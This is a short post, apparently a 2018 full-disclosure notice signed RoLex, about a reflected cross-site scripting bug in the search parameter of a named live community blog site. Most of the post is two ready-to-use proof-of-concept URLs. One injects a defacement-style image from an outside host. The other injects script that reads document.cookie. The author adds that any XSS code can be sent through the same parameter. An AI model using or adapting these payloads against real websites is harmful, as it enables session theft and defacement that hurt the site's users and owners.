Embarcadero community XSS bug

Vulnerable page: https://community.embarcadero.com/

PoC
https://community.embarcadero.com/blogs/blog-menu?search="><img src=http://www.te-home.net/gallery/xssd_by_teamelite.png>

PoC
https://community.embarcadero.com/blogs/blog-menu?search="><script>alert(document.cookie)</script>

You can either include any XSS code in search input box, or request any XSS code directly using GET method and search parameter.



Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Написано RoLex в 2018-02-24 13:474 likes

Комментарии

There are no comments for this news article, you can leave one here.